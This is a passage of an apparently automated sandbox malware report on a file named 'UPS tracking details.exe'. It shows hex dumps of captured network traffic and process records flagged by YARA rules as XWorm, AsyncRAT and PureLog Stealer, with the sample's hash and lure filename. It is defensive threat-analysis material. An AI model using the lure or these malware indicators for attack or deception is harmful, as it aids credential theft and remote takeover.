                                            Data Raw: 3b 86 64 13 ed a7 7c 3b e7 bd 1a a8 88 96 ae 00 f9 bd 16 59 87 65 42 cc 9d 47 1b 8e 3b 73 17 53 17 8e 3f 45 8d 3e d6 53 9e dc a2 bb 73 89 ef 5b 08 17 e8 c4 d5 ad 73 20 24 c4 ea fe 57 44 68 b8 d2 10 76 ac e1 71 82 d2 ca c7 08 de 88 a3 3a d1 21 cf a1 b6 6d 9a 49 5e 5b 6c e2 11 03 78 c3 6b 1f 11 5f 92 ac bd 47 6d 5a db e6 2a a0 64 47 ec d9 f0 dd 34 f3 8b a8 96 11 20 9a 87 03 cf d1 86 80 e9 11 4d 3f 69 d1 7a 86 19 1d 89 7e 35 2f ef a4 18 43 e4 7f f7 7f 8e f9 7a ef d7 53 ad 43 d9 82 15 ea 27 c9 2d a7 8e 96 e4 e7 ef f7 04 55 5c 69 5d b4 5e 6d 8a 88 56 6a c6 69 3b 02 08 2a dd 58 23 4a 1b 17 47 24 b5 ad 62 38 22 64 ce 22 5f 9c 28 6a 25 db 9b c9 8a 78 22 d5 d0 c9 6d ec 0b b6 25 fb 15 f8 c1 2f cf 89 54 95 d5 81 4a 3b 6c af 2e 23 83 61 33 d2 60 75 5f 00 46 93 32 cc 1a 6b d3 6b f5 8b 00 ed ce 62 cb e7 93 91 cb 11 41 98 b1 bb 6e d4 17 58 c4 88 64 75 27 d9 c2 b8 84 4a f6 f2 67 75 74 df ca 45 59 68 2d c9 e9 f1 98 07 24 92 0a 70 cb c2 18 65 30 6c eb eb df 73 28 a0 3e 4b 36 e2 28 94 c5 eb 92 89 f7 57 d5 37 a5 9a 21 [TRUNCATED]
                                            Data Ascii: ;d|;YeBG;sS?E>Ss[s $WDhvq:!mI^[lxk_GmZ*dG4 M?iz~5/CzSC'-U\i]^mVji;*X#JG$b8"d"_(j%x"m%/TJ;l.#a3`u_F2kkbAnXdu'JgutEYh-$pe0ls(>K6(W7!6\xIQ#mB4]raE5],D/LJ`G`(D^o.SOd{"^sZxx7i (GUPfTOfHH.cnR0T+C4HI$+7!Bu0g045!~Q!*0h[rPt=j2~rG+m?6qU^_/WF",m/>A>2+{"@@rNBA!&ST+bfGzc5r: R.@_AJMNa5^[DOk)t)dN&W@gWq6+o%CbV\tB?9lN>M{|m:M4a".eS8WuFX9RoU6v*)TA>P0{3dR`Cw^"0b\)FevJ+/
                                            Mar 3, 2025 08:45:53.879576921 CET1236INData Raw: 95 b5 8d 7e d3 c6 aa 46 08 3e bc b6 74 25 65 aa 36 88 23 eb 2a 7c ba e3 b1 eb 9b 37 7a 26 39 a3 b0 dd 42 ef 87 f4 25 7d 64 85 49 ac 24 ef b5 15 7d 7b 57 b9 0b 47 dc 2d 2c cc 65 8f 2c 62 18 3e f7 fd bf 43 44 2a 26 e4 dc 43 1d f5 84 e7 ef f8 8d 05
                                            Data Ascii: ~F>t%e6#*|7z&9B%}dI$}{WG-,e,b>CD*&CH+r#7\K9c!Kn*A(. >(=_;Q.t+9|`|rLjmL4e6^-RIU`qr)u3@pn%\k\slXQ, WTk#0/
                                            Mar 3, 2025 08:45:53.879590034 CET448INData Raw: 5a 6c 8d ab f8 2c c4 3e 20 78 22 ad 56 9d df 7b 43 88 09 bd ad 0b 09 91 46 40 3b cb c6 38 b0 91 1e fe dd e4 64 8f 0f 5c 60 95 2e ac a3 4a 64 d3 ba 58 7d 5a 39 b7 2a 13 d6 c7 06 5e 45 45 b7 0b 13 05 33 3f 62 f1 9a 87 0e 91 9d d8 ff 16 3c 51 52 a5
                                            Data Ascii: Zl,> x"V{CF@;8d\`.JdX}Z9*^EE3?b<QRm\W$a8%,(O"]^^.;z5U]:Fe^',<nq>)$m>!*-7}X*PX%]qMLuDRq[YX-Kzv+)kXt|0HA<
                                            Mar 3, 2025 08:45:53.879600048 CET1236INData Raw: 76 c1 99 a6 07 c2 1d b3 ea 10 9e 63 29 57 28 0a 5d 47 63 b7 e7 5a fc 0a 30 ce a7 40 fc 8b 5e a9 6a 65 5a 2d 09 94 b1 44 33 ed 24 82 ad 5f 53 c7 fa 53 13 2f 66 ed 83 18 99 3c 5a 0d de 8e f4 d9 c7 c0 38 82 3e bc 18 27 c9 f2 e9 91 71 1f 95 28 2c b0
                                            Data Ascii: vc)W(]GcZ0@^jeZ-D3$_SS/f<Z8>'q(,~z.r)*l3FB)[#5ZG9ZfbRv m;!TlMgf? > o09\aGL>,QhxMAU%UX@
                                            Mar 3, 2025 08:45:53.879611969 CET1236INData Raw: cd 62 52 b1 90 9c 33 f0 59 af 44 c1 dc 01 e3 ea d0 08 db c1 5e 87 cb 0d 5b 53 34 9e ec 35 ea 48 21 38 fd e5 72 c5 1f 28 6d 99 ef 1f dc 22 e3 09 da 1b 4b 75 e6 16 cd 83 94 4e 42 02 92 f8 06 68 a7 a1 79 bd e1 3b a9 19 2d 81 18 39 b6 72 cf 85 f7 09
                                            Data Ascii: bR3YD^[S45H!8r(m"KuNBhy;-9rHjj9CO+&@6rwh9SpX$naL[ZVyQHuJcl8fmH~G;"^8`QY0++_fp>vU>O1*:
                                            Mar 3, 2025 08:45:53.879625082 CET1236INData Raw: 5d 24 0f af c4 b1 5c 1d 4b 3d bc f6 cc 22 35 43 18 f8 b0 c8 b4 32 2e b2 c1 67 ea 8d 65 c2 b4 de 12 85 4e fe ec 51 8f 10 13 52 66 c8 18 fb 76 74 84 5e 64 0b 08 03 ae 84 b8 c3 e0 a2 76 b1 3e 9d 57 a2 f0 2a a4 1c c7 81 60 5b 30 58 6b 33 60 e1 6c 08
                                            Data Ascii: ]$\K="5C2.geNQRfvt^dv>W*`[0Xk3`lTx0Z[bj%c?gyv}p5[2my+&IV#(EeHur-S<"Zg(3NET@)q@mjuODVieV+|
                                            Mar 3, 2025 08:45:53.879637957 CET1236INData Raw: 0c a7 89 d3 d2 44 79 a5 93 96 f3 94 23 1e 4c 12 28 53 3c 62 d0 de d3 2f c0 d0 e7 52 16 5b 16 64 93 fb e3 b8 ce 0a 28 e1 8e a5 71 f8 b2 8c 50 88 60 27 20 ed 59 2d b4 9c fd 6f 1d a8 19 f0 fe 55 fe c6 5e 20 0c a8 9d 2c 57 c8 67 28 29 1f 16 6c 91 58
                                            Data Ascii: Dy#L(S<b/R[d(qP`' Y-oU^ ,Wg()lX2K#.-ej&7#46yULqNIFHke\%G T=F/hvQbE0nB%p(KELQMfFa|lhvJF8IP:\CCd)}9l
                                            Mar 3, 2025 08:45:53.879650116 CET1236INData Raw: 96 20 54 04 d9 e6 c1 5e 5a 40 a2 52 eb 09 58 97 36 a6 44 27 c1 1c 00 00 9b ca 19 50 ae 9c 7a 78 ab ed b9 0e 28 d8 3e 86 9d 34 61 c6 11 d3 c4 21 0b d7 1d d8 22 98 da e2 13 53 82 4c 0f a7 53 b8 33 97 c1 83 c6 25 e7 b1 e2 7e d4 40 4f 93 64 81 f8 80
                                            Data Ascii: T^Z@RX6D'Pzx(>4a!"SLS3%~@Odpv1I8Snq4H~I=XBCvi(`*)5YSDa=ceisz"lo^6h|H4.Eq]o,\"dj7Z sUFF
                                            Mar 3, 2025 08:45:53.879662037 CET1236INData Raw: 40 85 32 42 0e 7b fc 6e a9 82 3a a1 99 ba df 04 46 20 8b d1 26 13 55 87 20 5e 94 f2 5f ac a9 e7 e2 06 37 1f 2e a8 10 19 0b d1 ed f4 69 8c ae cc a6 2b c2 da e7 bb 59 6b 4d f0 2b 2f 50 2d aa ce 17 38 87 a8 6b 82 e6 e0 be a8 d9 a6 d9 89 24 25 5d 92
                                            Data Ascii: @2B{n:F &U ^_7.i+YkM+/P-8k$%]:/kD)~I?u?7HYZ&ZM{^n`'5u9(+@tL>sYE%&Ipm6J\7H=Rnou8h{#|Om;
                                            Mar 3, 2025 08:45:53.879683018 CET776INData Raw: fe de b2 5d 29 9c a1 b4 99 69 da 45 c9 05 bf ab 24 8f e2 48 da 50 c1 af 87 75 d5 7f a3 7f 46 50 a1 f3 4b 66 e4 f5 b2 7d 24 a3 86 3d 53 4a 49 ce 52 d2 eb 9e 6b 62 a2 30 06 3a cf f8 24 95 45 d0 37 0d 24 b0 6d 69 c3 08 75 26 79 fe 2e b7 f0 6a c4 3d
                                            Data Ascii: ])iE$HPuFPKf}$=SJIRkb0:$E7$miu&y.j=mFHk7e@t\.us?8>D2s|JdWyHhII&?""kIenK22;v>2~@31{Y+=IW(Km_umT,h#
                                            Mar 3, 2025 08:45:53.884787083 CET1236INData Raw: 29 e0 6a 73 2e d4 f6 24 a1 28 ed cf 51 a5 ee ef d9 5b 66 9c 51 cd 5c d5 c9 b8 44 53 f3 7d 29 59 28 f0 3d ee 5d b3 e8 5e 36 2a 4e 01 8d b5 53 43 59 38 1b 8b ea 71 2c bc a7 16 64 ed 6f 8e 11 15 4b c5 38 5e 4e e9 af 16 dd af 8b 1b e7 61 d7 8c f0 3a
                                            Data Ascii: )js.$(Q[fQ\DS})Y(=]^6*NSCY8q,doK8^Na:OoD4UNxF:y*JCi}h|qNWKclTB[meX@IVTF34`Q;}Hqr3xOGj.dPhDU"ao+0


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:1
                                            Start time:02:45:51
                                            Start date:03/03/2025
                                            Path:C:\Users\user\Desktop\UPS tracking details.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\UPS tracking details.exe"
                                            Imagebase:0xe0000
                                            File size:871'424 bytes
                                            MD5 hash:28BADF3EB1AA6CE975FEE86E6EC1DC14
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1682564416.00000000029ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1682564416.00000000029ED000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000000.1536927005.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.1699346885.00000000059F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1682564416.000000000266D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.1695473543.0000000003581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:02:46:05
                                            Start date:03/03/2025
                                            Path:C:\Users\user\Desktop\UPS tracking details.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\UPS tracking details.exe"
                                            Imagebase:0x800000
                                            File size:871'424 bytes
                                            MD5 hash:28BADF3EB1AA6CE975FEE86E6EC1DC14
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.2789720458.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:low
                                            Has exited:false

                                            Target ID:6
                                            Start time:02:46:08
                                            Start date:03/03/2025
                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 928
                                            Imagebase:0xea0000
                                            File size:483'680 bytes
                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Reset < >